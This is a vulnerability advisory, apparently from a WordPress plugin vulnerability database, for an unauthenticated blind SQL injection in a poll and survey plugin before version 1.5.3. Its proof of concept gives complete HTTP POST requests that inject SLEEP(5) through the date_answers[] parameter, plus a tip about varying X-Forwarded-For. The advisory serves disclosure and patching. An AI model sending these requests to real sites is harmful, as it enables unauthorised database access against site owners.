WordPress Plugin Vulnerabilities
Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection
Description
The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks
Proof of Concept
v < 1.5.3 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 X-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done] Cookie: [any user, authenticated or not] Connection: close question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5) v < 1.5.1 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Cookie: [any user, authenticated or not] Connection: close question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)
Affects Plugins
Fixed in version 1.5.3
References
Classification
Miscellaneous
Original Researcher
Toby Jackson
Submitter
Toby Jackson
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-06-22 (about 1 years ago)
Added
2021-06-22 (about 1 years ago)
Last Updated
2022-01-17 (about 5 months ago)